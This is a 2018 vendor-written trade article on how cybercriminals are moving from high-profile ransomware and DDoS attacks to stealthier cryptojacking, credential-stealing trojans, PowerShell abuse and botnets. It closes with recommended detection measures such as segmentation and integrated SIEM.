Cybercriminals Shift Tactics to Keep a Low Profile

shutterstock 518318218

Over the past several years, cyberattacks have become more targeted and sophisticated. Cybercriminals have begun to augment their attacks with advanced technologies, such as machine learning and automation, to increase the speed and efficiency of attacks, as well as to expand the number of potential victims by being able to identify and target multiple vulnerabilities. They have also expanded pay-as-you-go “as a service” attack models to make it easier to proliferate attacks. Cybercriminals have also demonstrated their increased prowess at highly-disruptive public attacks, taking large numbers of organizations, and even segments of the Internet, offline on a regular basis. However, while tactics such as DDoS and ransomware can have a major impact on a network, their disruptive nature typically leads to fairly quick remediation efforts.

Recent threat trends, however, indicate that organizations may have new cause for concern. Our Threat Landscape Report for Q2 indicates that cybercriminals are now choosing to move away from more visible attacks in favor of subtler, yet equally-effective strategies that enable them to use the library of exploits and services available to them while evading immediate detection. These methods allow cybercriminals to achieve greater dwell time in which to understand and map a compromised network and exfiltrate greater amounts of data over an extended period of time.

In light of this trend, it’s important that organizations understand the specific types of threats cybercriminals are now leveraging to stay under the radar, and the types of security controls they must implement to detect and minimize the impact of these attacks.

The Change in the Cyber Status Quo

Think back on some of the major cyberattacks of the past several years. It’s likely that attacks such as WannaCry and Petya come to mind. These high-profile ransomware attacks spread rapidly across the world, bringing operations to a halt in organizations across industries, particularly in the healthcare sector. While these attacks were highly disruptive for those organizations that were affected, their publicity allowed other organizations to patch the EternalBlue exploit to avoid infection. Because threat response efforts at affected companies, even though it was a time-consuming process, started immediately, with the result that the impact of these attacks was mitigated.

Likewise, powerful DDoS attacks have also been a very public, and a common attack vector. For example, a 2016 attack on an internet management company resulted in the inability of thousands of users to access a number of websites. Again, the public and disruptive nature of this attack brought it to the attention of IT teams quickly, allowing for fast response times. To compensate, criminals had to launch more attacks against the organization throughout the day.

The common element of these attacks was their high profile. As Internet sites, security vendors, and news media raised the alarm, thousands of companies were able to harden themselves against an attack, or actively search for and remediate affected systems. Diverging from these public attacks with sophisticated exploits designed to avoid detection means that organizations will have to ensure they have the necessary threat detection and prevention measures in place before an attack occurs.

Under the Radar Cyber Threats 

Making attacks more discrete makes it increasingly difficult for IT teams to detect them. It also allows cybercriminals to extend their dwell time in the network, enabling them to learn where critical information is stored, as well as what normal user behavior looks like in order to better mimic it. Ultimately, this also enables them to make calculated efforts to exfiltrate even more data or valuable collateral.

Several of these new attack strategies were outlined in our Q2 Threat Landscape Report, including:

Cryptojacking: Cryptomining malware has become common way for cybercriminals to mine for valuable cryptocurrencies by hijacking the processing power of other people’s devices. While cryptomining malware is distributed as many are, through malicious links or attachments, during an attack an infected device gives little indication of having been compromise, other than perhaps slower performance. However, the CPUs on infected devices are being used to mine for cryptocurrencies. Until recently, cryptojacking was carried out on vulnerable servers and PCs. To evade detection, attackers used techniques such as monitoring legitimate CPU cycles so as to only use a percentage of unused processing power. However, cybercriminals have recently increased the reach of these attacks to target IoT devices. IoT devices are more valuable for this practice because they are constantly connected, allowing attackers to mine continually, have powerful GPU processors that can be hijacked, and are generally dormant through much of the day, thereby maximizing the time that can be used for mining.

Information Stealing Trojans & Agents: The Q2 Threat Report further documented the shift toward under-the-radar attacks by detailing the increase in information stealing malware and agents. For example, Loki and Fareit malware tools are able to harvest credentials that can then later be used for fraud. Another important discovery this quarter was the unauthorized use of PowerShell / Agent by malware tools. PowerShell is a commonly used, though seemingly innocuous administrative tool. However, it has recently begin to be leveraged by attackers to download malicious files to the system and then change privileges, enabling enhanced lateral movement across the network. Even more challenging, the nature of the PowerShell attack makes it especially difficult to detect.

Botnets: Similar to cryptojacking, botnets take over computers and IoT devices to carry out cyberattacks. While the Q2 Threat Report closely examines many of the top botnets, there are two in particular that stand out within the context of more subtle attacks. Smominru had a strong presence this past quarter, targeting Windows platforms and allowing attackers to quietly issue commands as well as download and install files. Additionally, Gh0st allows an attacker to take full control of a device, recording keystrokes and webcam feeds as well as downloading and uploading files. This information can then be used later for login credentials and more.    

Discrete Attacks Call for Threat Detection Systems

Many of these attacks lie dormant after successfully breaching the network in order to baseline network activity and discover ways to obscure their presence and escalate privilege. And once they become active, they mimic legitimate traffic to evade detection by security tools. To address these challenges, organizations must implement threat detection controls designed to quickly detect even the most sophisticated threats to minimize dwell time. Successful breaches are inevitable. However, minimizing dwell time through rapid detection and response will reduce their impact.

  • First, organizations should implement internal segmentation firewalls. This will ensure that if an attack is successful, sensitive data is isolated behind an additional layer of security while attacks are limited to a small subset of the larger distributed network.
  • IT teams should also be sure to stay aware of current threat trends by conducting or subscribing to threat research and reports. Understanding current threat trends provides context to security events, helping to determine how controls and configurations need to be altered and augmented to withstand modern attacks.
  • Finally, IT teams must incorporate integration and automation with things like behavioral analytics to reduce complexity, detect network, device, workflow, or application anomalies, and minimize response time.

Though NOC and SOC operations monitor the network, they do so largely in siloes with separate tools that are not able to automatically correlate threat findings. To detect sophisticated, evasion-oriented threats, IT teams need a SIEM that provides complete visibility into each device connected across the network, including its threat potential. With this visibility, IT teams can see looming threats and issue automated remediation efforts to minimize dwell time, without falling victim to alert fatigue. For greater context, these tools must also be informed by integrated data from both the NOC and the SOC, as well as be tied to broader threat intelligence feeds to better identify local and global threats.

Having such an integrated view across the network, including the various security tools that have been implemented enhances visibility into data movement and user behavior, making it easier to identify anomalous behaviors that indicate an attack.

Final Thoughts

While cybercriminals have not entirely abandoned flashier, higher profiles efforts such as ransomware and DDoS attacks, threat data shows a marked increase in new threats designed to dwell in the network and evade detection until an opportune moment arises. To address this challenge, organizations must stay aware of threat trends and popular attack vectors and increase their threat detection capabilities through advanced analytics and correlation solutions and strategies. 

 our latest Fortinet Global Threat Landscape Report to find out more detail about recent threat landscape trends.

Sign up for our weekly FortiGuard Threat Brief.


Copyright © 2018 IDG Communications, Inc.